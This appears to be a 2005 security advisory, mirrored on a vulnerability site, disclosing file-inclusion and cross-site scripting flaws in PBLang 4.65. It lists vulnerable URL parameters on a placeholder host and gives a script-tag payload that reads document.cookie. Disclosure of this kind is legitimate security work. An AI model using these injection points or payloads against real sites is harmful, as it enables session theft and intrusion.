Computer Security

Security Advisory: File Including In PBLang
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  [SA17333] phpESP Unspecified Cross-Site Scripting and SQL Injection

  [SA17353] gCards "limit" SQL Injection Vulnerability

  [Full-disclosure] Multiple vulnerabilities within RockLiffe MailSite Express WebMail

  [SA17316] Flyspray Cross-Site Scripting Vulnerabilities

From:abducter_minds_(at)_yahoo.com <abducter_minds_(at)_yahoo.com>
Date:29.10.2005
Subject:File Including In PBLang


Class:  Input Validation Error  
CVE:  CVE-MAP-NOMATCH  
Remote:  Yes  
Local:  Yes  
Credit:  Abducter (ABDUCTER_MINDS@YAHOO.COM) Or (ABDUCTER_MINDS76@HOTMAIL.COM)
Vulnerable:  File Including In PBLang 4.65 (ALL VERSION)
* info *
PBLang IS POWER PHP SITES SUPPORT HERE
http://pblang.drmartinus.de/

* expliot *
http://www.victim.com/profile.php?u=[abducter here]
http://www.victim.com/pmpshow.php?num=[abducter here]
http://www.victim.com/delpm.php?id=[abducter here]

u can do xss in any expliot as this
http://www.victim.com/pmpshow.php?num=<script>JavaScript:
alert(document.cookie);</script>

* credit *
        Devil-00
        Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P
        HACKERS PAL ..
        WwW.S4a.Cc
        MY LOVE (N0N0)
      
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru